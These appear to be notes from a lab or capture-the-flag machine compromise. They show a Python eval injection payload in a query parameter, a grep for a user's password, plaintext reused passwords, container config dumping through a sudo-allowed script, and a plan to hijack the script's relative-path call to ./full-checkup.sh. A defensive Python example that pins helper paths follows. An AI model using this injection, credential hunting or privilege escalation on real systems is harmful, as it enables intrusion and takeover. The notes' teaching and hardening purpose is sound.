command injection in query: the input is passed to eval

'+__import__('os').system("bla bla") )#

find cody's password via

grep -Ri cody

svc shares the same password

~~jh1usoih2bkjaspwe92~~

we have a sudo rule for the script in /opt/scripts/. there's a repo, so maybe we can find an admin cred

find containers

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps

CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES                                                                  
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   3 months ago   Up 3 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea            
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   3 months ago   Up 3 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

get the container's env vars

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' "9608" | jq

the administrator account on gitea shares the password yuiu1hoiu4i5ho1uh

now we can see what the scripts do

sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup calls ./full-checkup.sh by relative path, so just hijack it with our own
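
the fix for that last finding, as an added example (not code from system-checkup.py): a root-run wrapper that calls ./full-checkup.sh resolves it against the caller's working directory, so the hardened form pins the helper to one fixed directory and refuses files or directories with loose ownership or permissions. the function names, the trusted_uid parameter and the temp-dir layout are assumptions made for illustration.

```python
import os
import stat
import subprocess
import tempfile

def relative_helper(name):
    """Weak pattern: './name' resolves against the caller's working directory."""
    return os.path.realpath(os.path.join(".", name))

def pinned_helper(name, trusted_dir, trusted_uid=0):
    """Hardened pattern: resolve inside one fixed directory and vet what is found."""
    base = os.path.realpath(trusted_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(path) != base:  # rejects ../ and symlinks leading out
        raise PermissionError(f"{name!r} resolves outside {base}")
    for p in (base, path):
        st = os.stat(p)
        if st.st_uid != trusted_uid:
            raise PermissionError(f"{p} is not owned by uid {trusted_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{p} is writable by group or others")
    return path

def run_helper(name, trusted_dir, trusted_uid=0):
    """Run the vetted helper by absolute path, with the child's cwd pinned too."""
    path = pinned_helper(name, trusted_dir, trusted_uid)
    done = subprocess.run(["/bin/sh", path], cwd=os.path.dirname(path),
                          check=True, capture_output=True, text=True)
    return done.stdout.strip()

def demo():
    uid, start = os.getuid(), os.getcwd()
    with tempfile.TemporaryDirectory() as root:
        dirs = {}  # constructed layout: the helper's real dir plus an unrelated cwd
        for label in ("trusted", "elsewhere"):
            dirs[label] = os.path.join(os.path.realpath(root), label)
            os.mkdir(dirs[label])
            os.chmod(dirs[label], 0o755)
            script = os.path.join(dirs[label], "full-checkup.sh")
            with open(script, "w") as fh:
                fh.write(f"#!/bin/sh\necho {label}\n")
            os.chmod(script, 0o755)
        os.chdir(dirs["elsewhere"])  # the caller starts somewhere else
        try:
            weak = relative_helper("full-checkup.sh")
            pinned_out = run_helper("full-checkup.sh", dirs["trusted"], uid)
        finally:
            os.chdir(start)
    return os.path.basename(os.path.dirname(weak)), pinned_out
```

demo() returns which directory the relative lookup landed in and what the pinned helper printed; in production trusted_uid stays 0 so only root-owned, non-writable helpers run.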